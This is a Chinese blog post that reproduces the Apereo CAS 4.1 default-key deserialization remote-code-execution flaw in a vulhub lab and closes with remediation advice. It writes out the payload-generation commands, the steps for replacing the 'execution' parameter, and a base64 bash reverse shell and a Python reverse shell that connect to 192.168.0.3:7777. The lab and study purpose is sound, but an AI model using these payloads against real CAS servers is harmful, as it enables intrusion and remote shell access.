Apereo cas 密钥硬编码反序列化漏洞复现与利用

已于 2023-12-27 10:53:29 修改
阅读量174 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络安全 测试工具
于 2023-12-27 10:45:46 首次发布
原文链接:https://www.freebuf.com/vuls/349779.html
版权

前言

最近也是在工作中遇到这个漏洞,之前没接触过,而且这个漏洞也比较老了,是2016年发现的,并且是基于反序列化产生的,所以就打算学习并且做一下复现,如果以后再遇到的时候能够知道该如何分析。

0x01 Apereo cas简介

Apereo CAS 单点登陆系统是Java服务器环境下使用较为广泛的单点登陆系统。
CAS 全程Central Authentication Service(中心认证服务),是一个单点登录协议,Apereo CAS是实现该协议的软件包。
单点登录定义
单点登录(Single sign on),英文名称缩写SSO,SSO的意思就是在多系统的环境中,登录单方系统,就可以在不用再次登录的情况下访问相关受信任的系统,也就是说只要登录一次单体系统就可以。

0x02 漏洞简介

最早发现此漏洞的文章:https://apereo.github.io/2016/04/08/commonsvulndisc/
漏洞成因是在4.1.7版本以前一直存在一个默认密钥问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,从而执行任意命令。
Apereo CAS 4.1.X~4.1.6 默认密钥
Apereo CAS 4.1.7~4.2.X KEY随机生成
最新版的Apereo CAS https://github.com/apereo/cas-overlay-template

0x03漏洞利用与复现

Webflow中使用了默认密钥changeit,所以我们就可以利用默认密钥生成序列化对象。
默认密钥

环境:安装了vulhub的kali
工具:apereo-cas-attack、burpsuite
Apereo-cas-attaack:使用ysoserial的CommonsCollections4生成加密后的Payload
1、启动vulhub中的Apereo cas环境

cd /vulhub/apereo-cas/4.1-rce
docker-compose up -d //启动docker环境

在这里插入图片描述
2、使用工具生成payload

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/sucess"

在这里插入图片描述

3、进入主页并抓包,替换execution

http://192.168.0.112:8080/cas/login

在这里插入图片描述
在这里插入图片描述

4、进入容器,在/tmp目录创建了success文件

docker exec -it <容器ID> /bin/bash
docker ps -a //查找容器ID,一串字符串的就是ID

在这里插入图片描述

5、其他利用方式

  • 反弹shell

bash -i >& /dev/tcp/ip/port 0>&1,需要使用base64编码,payload如下

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c  {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMy83Nzc3IDA+JjE=} | {base64,-d} | {bash,-i}"

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.3',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
  • 回显与检测

目的:网站所在系统环境无法出网,回显可以直接看到命令执行的返回内容。
使用魔改工具ysoserial-mangguogan-master,Payload如下,然后将编码后的数据替换execution,并且在请求头中添加cmd:whoami等命令,send查看回显。

java -jar ysoserial-managguogan-0.0.1-SNAPSHOT-all.jar encode CommonsCollections4

在这里插入图片描述

文章参考:
回显与检测 https://xz.aliyun.com/t/8260?page=5
反弹shell https://www.cnblogs.com/Qixiansheng/p/15474651.html
kali的vulhub搭建 https://www.cnblogs.com/lxfweb/p/12952490.html

0x04漏洞危害

任意命令执行

0x05漏洞修复

1、修改默认密钥
2、升级Apereo CAS版本

认真的老本
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
序列漏洞利用工具_Apereo_CAS_序列漏洞分析及利用
weixin_39777540的博客
11-28 3521
Apereo CAS 是一个开源的统一认证服务(单点登录系统),CAS是Central Authentication Service的首字母缩写。根据网上公开的漏洞详情,影响版本为4.1.X和4.2.X,本文讲述从环境搭建、漏洞分析到漏洞利用CAS序列漏洞一、环境搭建1. 4.1.X环境从github上下载cas-overlay-template,命令gitclone-b4.1...
cas-security-spring-boot-starter:用于Apereo CAS客户端的Spring Boot Starter与Spring Security完全集成
01-30
Spring Security CAS启动器 一个Spring Boot Starter,它将帮助您在应用程序安全上下文中配置 。 产品特点 Spring Boot 1和2支持 配置CAS身份验证和授权 支持基于当前HttpServletRequest动态服务解析 通过高级配置 ...
vulhub中Apereo CAS 4.1 序列命令执行漏洞
yougexiaojiuguan的博客
02-04 518
漏洞过程中的记录
Apereo CAS 4.1 序列命令执行漏洞
shierbai的博客
05-22 417
Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认的问题,利用这个默认我们可以构造恶意信息触发目标序列漏洞,进而执行任意命令。然后我们登录CAS并抓包,将Body中的`execution`值替换成上面生成的Payload发送。访问`http://your-ip:8080/cas/login`即可查看到登录页面。漏洞原理实际上是Webflow中使用了默认`changeit`如果报错试试换java版本。
Apereo CAS 序列漏洞
热门推荐
公众号shadow sock7
03-18 1万+
下载cas-4.1.5 放到tomcat的webapps目录下,自动解压。 运行成功之后返回登陆页面: 登陆的接口发有一个execution参数: 直接base64并没有得到有意义的字符: 在这里: org/springframework/webflow/mvc/servlet/FlowHandlerAdapter#handle开始处理, 对于没有execution(GET login页面...
Apereo cas 编码序列漏洞
m0_71745258的博客
01-12 2400
Apereo CAS 单点登陆系统是Java服务器环境下使用较为广泛的单点登陆系统。CAS 全程Central Authentication Service(中心认证服务),是一个单点登录协议,Apereo CAS是实该协议的软件包。单点登录定义单点登录(Single signon),英文名称缩写SSO,SSO的意思就是在多系统的环境中,登录单方系统,就可以在不用再次登录的情况下访问相关受信任的系统,也就是说只要登录一次单体系统就可以。
Apereo-cas 4.x序列漏洞
weixin_50464560的博客
12-07 2884
转载https://www.freebuf.com/vuls/226149.html 建议再查看https://xz.aliyun.com/t/7032#toc-7的放假前看到很多文章对这个漏洞进行分析,又因为过年期间的特殊情况,实在是无聊至极,所以自己也来学习一下,顺便恶补一下序列漏洞的知识。这篇文章记录了自己的一些想法以及相关的知识点,方便自己日后忘记可以重新拾起。第一次写文章有不好的,希望大家见谅。由于部分cas版本的加函数不同有相应的变,因此想要按照此文章来漏洞的话还是选择和我一样的
apereo cas6.3.2可执行war,集成mysql的jdbc认证模块
03-28
Apereo CAS 6.3.2 是一个广泛使用的开源单点登录(Single Sign-On, SSO)服务器,基于 Java 技术栈构建,特别适用于教育和企业环境。它提供了安全的身份验证和授权服务,允许用户通过单一登录界面访问多个应用程序。...
Shiro序列漏洞,Shiro版本升级资源
06-22
shiro版本时,其参数remeberMe存在编码,它对于cookie的处理流程是,首先获取rememberMe的cookie值,然后进行Base64解码,再进行AES解,最后序列。但在这个过程中,其AES的Key编码,导致序列漏洞的...
CAS_EXP:CAS编码远程代码执行漏洞
02-13
CAS编码远程代码执行突破 使用方式 java -jar cas-0.0.1-all.jar ----------------------- cas检测工具------------------------ --------- -----------本软件临时学习交流,如作他用所承受的法律责任一概与...
java-cas-client:Apereo Java CAS客户端
02-03
Java Apereo CAS客户端介绍这是Java Apereo CAS客户端的官方主页。 客户端由一系列Servlet过滤器组成,这些过滤器适用于大多数基于Java的Web应用程序。 它还用作API平台,以编程方式与CAS服务器进行交互,以进行身份...
Retrofit中的注解原理项目实战
bugyinyin的博客
12-05 836
今天我们来聊聊这个最近很火的网络请求库retrofit,在此基础上会延伸出一些列的知识点。在关于retrofit的文章很多,我之所以写这篇文章的原因在于:8月份负责假设新客户端底层的过程中首次尝试使用该库,并取得非常不错的效果,不到20天的时间内实新产品的快速开发。 另外因为个人的原因,在写完基础框架及发布两个基础版本之后,我也选择的离职。在,留给自己10天的时间,用来对2016年做个简短的总结,也希望能帮助各位。首先简单的说说会总结哪方面的,觉得感兴趣的同学可以关注下: 网络请求及优,以retr
Apereo CAS 4.1 序列漏洞
黑白的博客
12-21 1159
声明 好好学习,天天向上 漏洞描述 Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认的问题,利用这个默认我们可以构造恶意信息触发目标序列漏洞,进而执行任意命令。 影响范围 Apereo CAS <= 4.1.7 过程 这里使用4.1.5版本 使用vulhub cd /app/vulhub-master/apereo-cas/4.1-rce 使用docker启动 docker-compose build doc
vulhub漏洞系列之Apereo CAS 4.X序列漏洞
weixin_43071873的博客
12-08 754
昨天的时候,同事看到了我在这个cas,他和我说在企业用的都是5.x、6.x的了,4.x已经很少了,但没办法还得了解一下。他还说要想真正了解cas单点登录,要自己搭一遍这个系统,了解整个的架构,踩过了那些坑才能真正吃透,苦于最近确实时间不太够,就先留着以后学习吧。 漏洞简介:Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认的问题,利用这个默认我们可以构造恶意信息触发目标序列漏洞,进而执行任意命令。 影响范围:4
Apereo CAS 4.1 序列
weixin_44912035的博客
01-02 405
漏洞背景 Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认的问题,利用这个默认我们可以构造恶意信息触发目标序列漏洞,进而执行任意命令。 漏洞 环境启动后,访问页面如图所示: 漏洞原理是Webflow中使用了默认changeit: 下载地址:https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-
H3C-CAS 虚拟管理系统 文件上传漏洞
最新发布
06-21
H3C-CAS (Huawei Cloud Agile Switch) 虚拟管理系统的文件上传漏洞是指该系统中存在的一种安全漏洞,允许攻击者可能利用漏洞向服务器上传恶意文件或执行未经授权的操作。具体来说,这类漏洞通常存在于管理界面提供的文件上传功能设计不当之处,没有足够的输入验证和权限控制,使得攻击者可以通过构造恶意请求或利用系统缺陷上传文件到系统的关键路径上,进而可能导致数据泄露、权限提升或者系统被破坏。 关键问题: 1. 这个漏洞是如何被发利用的? 2.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值